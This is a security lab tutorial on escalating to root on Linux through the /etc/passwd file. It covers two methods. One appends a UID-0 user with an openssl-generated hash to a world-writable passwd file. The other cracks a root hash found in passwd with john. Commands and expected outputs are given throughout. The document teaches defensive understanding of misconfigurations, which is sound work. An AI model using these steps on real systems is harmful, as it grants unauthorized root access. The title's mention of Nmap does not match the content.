Explore Privilege Escalation via /etc/passwd File in Nmap

Introduction

The /etc/passwd and /etc/shadow files are crucial for user authentication in Linux systems. If system administrators misconfigure the contents or permissions of these files, it can lead to privilege escalation vulnerabilities. In this lab, we will explore methods for privilege escalation by exploiting the /etc/passwd file.

Understanding the /etc/passwd File

In this step, we will explore the structure and meaning of the /etc/passwd file.

On Linux systems, user password information is stored in two files: /etc/passwd and /etc/shadow. The /etc/passwd file contains user information, with each line representing a single user account. Each line is divided into seven colon-separated fields:

Username
Password (if set to x, the password is stored in /etc/shadow)
User ID (UID, 0 for the root user)
Group ID (GID)
User Information (Full Name, Room Number, Work Phone, Home Phone, and Other)
Home directory
Default shell

Now, Open a terminal and Navigate to the /home/labex/project directory to proceed to the next step.

cd /home/labex/project

Get labex user's information from the /etc/passwd file and save it to a file named labex_passwd.txt in the /home/labex/project directory.

grep labex /etc/passwd > /home/labex/project/labex_passwd.txt

Check the contents of the labex_passwd.txt file.

cat labex_passwd.txt

Expected output:

labex:x:5000:5000::/home/labex:/usr/bin/zsh

Here's what each field represents:

Username: test-user
Password: stored in /etc/shadow (indicated by x)
UID: 5000
GID: 5000
User Information: In this case, it's empty
Home directory: /home/labex
Default shell: /usr/bin/zsh

During the Linux authentication process, the following steps occur:

The entered username is checked against the first field in each line of the /etc/passwd file.
If a match is found, the password in the second field is compared.
Upon successful authentication, the user's permissions are determined by the UID (third field) and GID (fourth field).
Importantly, a UID of 0 represents the root user, granting full administrative privileges, regardless of the username.

As you can see, the /etc/passwd file plays a critical role in the Linux authentication process. If an attacker can modify this file, they may be able to gain unauthorized access and escalate their privileges.

Privilege Escalation via /etc/passwd (Write Access)

In this step, we will learn how to escalate privileges by exploiting write access to the /etc/passwd file.

First, let's set up the lab environment. Open a terminal and navigate to the /home/labex/project directory:
```
cd /home/labex/project
```
run the following command to set up the lab environment:
```
./env_setup1.sh
```
This command will execute a script that sets up the lab environment. You should see an output indicating that the environment is ready.
After the setup, you will be logged in as the user001 user, simulating an initial shell access obtained during a penetration test.

Navigate to the user001 user's home directory:
```
cd ~
```
Use the whoami command to verify your current user:
```
whoami
```
Expected output:
```
user001
```
Use the id command to view your user and group IDs:
```
id
```
Expected output:
```
uid=1001(user001) gid=1001(user001) groups=1001(user001)
```
As you can see, you are a regular user without any special privileges.
Next, check the permissions of the /etc/passwd and /etc/shadow files:
```
ls -l /etc/passwd /etc/shadow
```
Expected output:
```
--wx--xrwx 1 root root    1961 Apr  5 00:21 /etc/passwd
-rw-r----- 1 root user001 1101 Apr  5 00:21 /etc/shadow
```
Notice that the /etc/passwd file has execute and write permissions for all users (--wx--xrwx), which is a misconfiguration by the system administrator.

Our goal is to create a new user entry in the /etc/passwd file with a custom username, password, and a UID of 0 (root). This will allow us to log in as the root user.

First, let's examine the format of the root user's entry in the /etc/passwd file by extracting it to a new file named new_user_entry.txt:
```
cat /etc/passwd | grep root > new_user_entry.txt
```
Expected output when you use the cat command to view the contents of the new_user_entry.txt file:
```
root:x:0:0:root:/root:/bin/bash
```
To create our own entry, change the username from root to any desired name, such as new-user in the new_user_entry.txt file:
```
new-user:x:0:0:root:/root:/bin/bash
```
Replace the x in the second field with the encrypted password hash. We can use the openssl tool to generate the hash for a password (e.g., pass123):
```
openssl passwd -1 -salt ignite pass123
```
Expected output:
```
$1$ignite$3eTbJm98O9Hz.k1NTdNxe1
```
Substituting the hash in the second field in the new_user_entry.txt file:
```
new-user:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash
```
Now, append this line to the /etc/passwd file:
```
echo "$(cat new_user_entry.txt)" >> /etc/passwd
```
Note: We can append the new entry to the /etc/passwd file because it has write permissions for all users. In a real-world scenario, this file should not have write permissions for regular users.

Verify the new entry by searching for new-user in the /etc/passwd file:

cat /etc/passwd | grep new-user

Expected output:

new-user:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash

Finally, switch to the new-user user with the password pass123:
```
su new-user
```
Enter the password pass123 when prompted. You should now have root privileges, as indicated by the change in the prompt:
```
user001@660ecfa4d7612c798ef141ab:~$ su new-user
Password:
root@660ecfa4d7612c798ef141ab:/home/user001#
```

Privilege Escalation via /etc/passwd (Password Hash)

In this step, we will learn how to escalate privileges when the root user's password hash is stored in the /etc/passwd file instead of the /etc/shadow file.

First, let's set up the lab environment. Open a terminal and navigate to the /home/labex/project directory:

If you sitll as new-user, you can use the exit command to exit the current shell till you reach the labex shell, then navigate to the /home/labex/project directory:
```
cd /home/labex/project
```
Run the following command to set up the lab environment:
```
./env_setup2.sh
```
This command will execute a script that sets up the lab environment. You should see an output indicating that the environment is ready.
After the setup, you will be logged in as the user001 user, simulating an initial shell access obtained during a penetration test.

Navigate to the user001 user's home directory:
```
cd ~
```
Check the permissions of the /etc/passwd and /etc/shadow files:
```
ls -l /etc/passwd /etc/shadow
```
```
-rw-r--r-- 1 root root 2059 Apr  5 01:36 /etc/passwd
-rw-r----- 1 root root 1101 Apr  5 00:21 /etc/shadow
```
This time, the file permissions are correctly configured, and you only have read access to the /etc/passwd file.
View the contents of the /etc/passwd file to find the root user's password hash:
```
cat /etc/passwd | grep ^root > ~/hash.txt
```
Check the contents of the hash.txt file by running the following command:
```
cat ~/hash.txt
```
Expected output:
```
root:$1$ignite$J98A8EVPG1O40.WnwrPEM1:0:0:root:/root:/bin/bash
```
Notice that the root user's password hash is stored in the second field of the /etc/passwd file. This is usually the result of a previous system compromise or misconfiguration by the system administrator.

Now, run john to crack the hash:

john ~/hash.txt > ~/cracked.txt

john is a popular password-cracking tool that uses dictionary attacks to crack password hashes. The output will indicate whether the password was successfully cracked.

Created directory: /home/user001/.john
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1g 0:00:00:00 100% 2/3 5.000g/s 6680p/s 6680c/s 6680C/s 123456..crawford
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Check the contents of the cracked.txt file to view the cracked password:

Loaded 1 password hash (md5crypt [MD5 32/64 X2])
hello            (root)

As you can see, john successfully cracked the password, which is hello.

Use the su command to switch to the root user, entering the cracked password when prompted:
```
su root
```
Enter the password hello when prompted. You should now have root privileges as indicated by the change in the command prompt.
```
user001@660ecfa4d7612c798ef141ab:~$ su root
Password:
root@660ecfa4d7612c798ef141ab:/home/user001#
```

Summary

In this lab, we learned about the Linux user authentication process, the significance of the /etc/passwd file, and how to exploit it for privilege escalation. We covered two scenarios: (1) when the /etc/passwd file has write permissions, allowing us to create a new user entry with root privileges, and (2) when the root user's password hash is stored in the /etc/passwd file, enabling us to crack the password using the john tool. Through hands-on practice, we gained a deeper understanding of how to leverage misconfigurations in the /etc/passwd file to escalate privileges on a Linux system.